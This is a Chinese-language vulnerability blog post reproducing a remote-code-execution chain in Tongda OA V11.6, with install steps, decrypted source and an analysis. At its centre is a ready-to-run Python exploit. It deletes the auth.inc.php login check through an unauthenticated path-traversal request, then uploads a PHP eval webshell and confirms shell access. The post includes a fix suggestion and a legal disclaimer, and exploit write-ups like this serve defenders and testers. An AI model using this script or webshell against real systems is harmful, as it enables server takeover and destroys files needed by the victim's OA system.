【漏洞日记】深X服还没完，通达OA又搞RCE漏洞【OA V11.6】

---

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

---

目录

0x01 通达OA V11.6 源码下载与安装

0x02 前言

0x03 复现漏洞

EXP 脚本

0x04 通达OA V11.5和V11.7 版本无法复现该漏洞过程

0x05 漏洞分析

---

本次漏洞复现，只测试了三个版本：

通达 OA V11.7 (最新)

通达 OA V11.6

通达 OA V11.5

修复建议：升级至最新版本

自己公司或去客户现场做测试的话，可以让客户去 webroot\inc 下将auth.inc.php备份一下，等利用成功GetShell 后，再将该文件放进去
2017版本的也可以被利用(版本自测)，2019版本的都不行，2020版的，我测试V11.6可以复现

解密 auth.inc.php 出来的代码

zend54 解密

                                      

<?php

include_once 'inc/session.php';
$PHPSESSID = isset($_GET['PHPSESSID']) ? $_GET['PHPSESSID'] : (isset($_POST['PHPSESSID']) ? $_POST['PHPSESSID'] : '');
if (preg_match('/^[a-z0-9]{20,32}$/i', $PHPSESSID)) {
    session_id($PHPSESSID);
}
if (stristr($PHP_SELF, 'export') || stristr($PHP_SELF, 'excel') || stristr($PHP_SELF, 'word') || stristr($PHP_SELF, 'attach.php') || stristr($PHP_SELF, 'download.php') || stristr($PHP_SELF, 'down.php')) {
    session_cache_limiter('private, must-revalidate');
}
session_start();
ob_start();
include_once 'inc/utility.php';
$SCRIPT_NAME = $_SERVER['SCRIPT_NAME'];
if (0 < MYOA_OFFLINE_TIME_MIN) {
    $LAST_OPERATION_TIME = $_COOKIE['LAST_OPERATION_TIME'];
    if (!stristr($SCRIPT_NAME, '/general/ipanel/') && !stristr($SCRIPT_NAME, '/general/task_center/') && !stristr($SCRIPT_NAME, '/general/mytable/') && !stristr($SCRIPT_NAME, '/general/status_bar/') && !stristr($SCRIPT_NAME, '/general/topbar.php') && !stristr($SCRIPT_NAME, '/inc/')) {
        setcookie('LAST_OPERATION_TIME', time(), 0, '/');
    }
    if ($LAST_OPERATION_TIME != '' && MYOA_OFFLINE_TIME_MIN * 60 < time() - $LAST_OPERATION_TIME) {
        $sessionid = session_id();
        del_my_online_status($sessionid);
        clear_online_status();
        setcookie('LAST_OPERATION_TIME', '', 1, '/');
        session_unset();
        session_destroy();
    }
}
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
    sleep(1);
    if (isset($_SESSION['SHARE_ID']) && $_SESSION['SHARE_ID'] != '') {
        $query = 'select module,module_id from share where share_id=\'' . $_SESSION['SHARE_ID'] . '\'';
        $cursor = exequery(TD::conn(), $query);
        if ($ROW = mysql_fetch_array($cursor)) {
            $module = $ROW['module'];
            $module_id = $ROW['module_id'];
            if (!isset($_SESSION['SHARE_ALLOW_URL'][$module]) || isset($_SESSION['SHARE_ALLOW_URL'][$module]) && $_SESSION['SHARE_ALLOW_URL'][$module] != $module_id) 

如果结构没有大变动的话，应该都是可以GetShell成功后，将复制的备份文件丢进去。

PS：

该漏洞影响很大，如果被成功利用后会删除OA所需要的php文件来绕过验证，会对网站造成影响，建议渗透测试业务时，千万要让客户做系统备份或数据备份，很容易出事... ...

其实也不必要那么麻烦，我们可以这样，那个OA被删除的文件，比如说我做渗透的时候，自己本地有一个那个文件，getshell后在本地的上传过去给他恢复，这样不就可行？

说干就干，自己提前备份文件后，再次执行EXP 删除auth.inc.php 后GetShell 成功，此时登录网站OA系统的样式已损坏，但只要把我们之前备份的样式auth.inc.php 文件，即可恢复。

请勿用作犯罪使用，网络不是法外之地，请珍惜生命，勿触犯法律... ...

你任何的动作，别人都知晓，人外有人，天外有天，且行且珍惜... ...

0x01 通达OA V11.6 源码下载与安装

通达OA V11.6 下载地址：http://www.kxdw.com/soft/23114.html

步骤1：运行安装包傻瓜式安装

                                       

步骤2：运行安装包傻瓜式安装

             

步骤3：运行安装包傻瓜式安装

                               

步骤4：成功安装

0x02 前言

账号为：admin 密码为：空

先登录看看，密码为空，直接登录，样式是这样的

0x03 复现漏洞

EXP 脚本

EXP：直接打，直接写到网站根目录下，文件名为：_agan.php，菜刀链接密码为：agan

import requests

target="http://192.168.159.137:8080/"
payload="<?php eval($_POST['agan']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('agan.php', payload)}
requests.post(url=url,files=files)
url=target+"/_agan.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

直接利用上述代码即可，改一下你的URL地址即可

成功利用

可以看到成功写入，先访问这个目录看看，是真实存在的

链接地址：http://192.168.159.137:8080/_agan.php

再去服务端看看网站源码，是否也存在？

       明显是存在的，也写进去了

                                                                               连接看看

                                     

                                                                            成功连接

此时虽然拿到WebShell后，但OA 的文件已损坏，再次登录是这样的，猜测是通过删除auth.inc.php文件来写入WebShell，导致引用的样式文件损坏

是不是以为这样，就完全没事呢？

其实，我们可以这样，那个OA被删除的文件，比如说我做渗透的时候，自己本地有一个那个文件，getshell后在本地的上传过去给他恢复，这样不就可行？

说干就干，自己提前备份文件后，再次执行EXP 删除auth.inc.php 后GetShell 成功，此时登录网站OA系统的样式已损坏，但只要把我们之前备份的样式auth.inc.php 文件，即可恢复。

0x04 通达OA V11.5和V11.7 版本无法复现该漏洞过程

用之前的脚本再试试

V11.5和V11.7 服务端网站根目录下没写进去，看来没利用成功。

0x05 漏洞分析

webroot/inc/auth.inc.php 解密一下文件

解密网址：https://dezend.qiling.org/free

/module/appbuilder/assets/print.php文件 (未授权访问导致产生文件删除漏洞)

这里可以看到 页面获取 guid参数的值
使用file_exists函数判断文件是否存在 并未进行校验 就执行unlink删除文件

exp中访问/general/data_center/utils/upload.php文件上传

调用action=upload上传文件
传入不存在的filetype 进入漏洞点

根据exp构造了上传文件名和内容 {‘FILE1’: (‘z1feiyu.php’, payload)}
同时利用file_exists函数的漏洞构造/.<>./.<>./.<>./ 逃逸出来
也就是说在这里构造访问上传后
file_exists判断存在将文件加_拼接目录移动到根目录下并删除原文件

总体的根据exp分析 首先存在了任意文件删除漏洞
然后删除登陆校验文件，进而导致任意文件上传漏洞
组合之后也就是现在的rce漏洞

参考链接：

               https://mp.weixin.qq.com/s/5ObQlLc3XQY3oXXHJKieyA

               https://mp.weixin.qq.com/s/cr4Iqq3RfxnOzTqZWzGSAQ

---

虽然我们生活在阴沟里，但依然有人仰望星空！

---